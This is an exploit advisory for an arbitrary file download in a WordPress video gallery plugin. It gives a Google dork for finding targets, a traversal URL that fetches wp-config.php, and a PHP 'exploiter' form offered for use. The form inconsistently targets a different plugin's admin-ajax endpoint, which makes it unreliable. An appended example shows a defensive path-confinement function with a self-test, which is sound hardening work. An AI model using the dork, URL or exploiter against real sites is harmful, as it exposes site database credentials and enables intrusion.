
WordPress Video Gallery Arbitrary File Download Vulnerability

Author: AnonJoker , Published: 20-06-2015
# Exploit Title : WordPress Video Gallery Arbitrary File Download Vulnerability
# Date : 20/06/2015
# Exploit Author : AnonJoker
# Contact : anonjoki@gmail.com | FB.COM/ANONJOKER008
# Category : Web Application Bugs
# Home : Mirrors-Zone.com
# Google Dork : inurl:/wp-content/plugins/contus-video-gallery/hdflvplayer/
# Tested On : Windows | Kali Linux

# Proof of Concept

http://[target]/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php

*****
Exploit :

/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php

*****

OR Use MY OWN Exploiter:


<?php
// Page skeleton: a single form that asks for the target host name.
echo "<body bgcolor='#000000'>";
echo '<center>';
echo '<form method="post">';
echo "<h4><font color='white'>www.site.com</font></h4><input type='text' name='target'>";
echo '<input type="submit" name="do">';
echo '</form>';

// Host name submitted through the first form (empty until the form is posted).
$site = isset($_POST['target']) ? $_POST['target'] : '';

if (isset($_POST['do'])) {
    // Escape the host before embedding it in HTML so the page itself cannot be injected.
    $site = htmlspecialchars($site, ENT_QUOTES, 'UTF-8');
    // Second form is rendered only after a host has been entered; it posts to that host.
    echo "<form action='http://{$site}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' method='POST'>
 <b>Config</b>:<input type='text' name='_mysite_download_skin' value='../../../../../wp-config.php' placeholder='www.site.com'><br>
<input type='submit' value='Get CFG'>
</form>";
}

echo "<h5><font color='white'> AnonJoker | RTH </font></h5>";
echo '</center>';
echo '</body>';
?>
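Added example, not part of this advisory and not the plugin's own code: a confined download handler of the kind download.php would need, which resolves the requested name against one media directory and refuses anything whose canonical path ends up outside it. The directory layout and files below are constructed for the self-test; the `videos` directory name is an assumption.

```php
<?php
// Added example, not the plugin's code: confine a user-supplied file name to one
// directory before serving it. The advisory's request, f=../../../../wp-config.php,
// is refused because its canonical path leaves the allowed directory.

/**
 * Return the canonical path of $user_file inside $base_dir, or null if the
 * name contains a NUL byte, the file does not exist, is not a regular file,
 * or resolves (including via symlinks) to a location outside $base_dir.
 */
function confined_path(string $base_dir, string $user_file): ?string
{
    if (strpos($user_file, "\0") !== false) {
        return null;                      // realpath() would reject it anyway
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, so the comparison below is
    // against the real on-disk location, not the text the client sent.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $user_file);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Self-test on a constructed layout under the system temp directory (php this_file.php).
$tmp = sys_get_temp_dir() . '/dl_demo_' . getmypid();
mkdir("$tmp/videos", 0700, true);
file_put_contents("$tmp/videos/clip.mp4", 'constructed video bytes');
file_put_contents("$tmp/wp-config.php", 'constructed secret');

$cases = [
    'clip.mp4'                  => true,   // legitimate request
    '../wp-config.php'          => false,  // traversal, as in the advisory
    '../../../../wp-config.php' => false,  // extra "../" segments are collapsed by realpath
    "clip.mp4\0.txt"            => false,  // embedded NUL byte
    'nosuch.mp4'                => false,  // missing file
];
foreach ($cases as $f => $expected) {
    $served = confined_path("$tmp/videos", $f) !== null;
    printf("%-28s %s\n", addcslashes($f, "\0"), $served === $expected ? 'OK' : 'FAIL');
}

// Clean up the constructed files.
unlink("$tmp/videos/clip.mp4"); unlink("$tmp/wp-config.php");
rmdir("$tmp/videos"); rmdir($tmp);
```

Every case should print OK; the `../wp-config.php` line is the one that exists on disk yet is refused by the prefix check alone.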
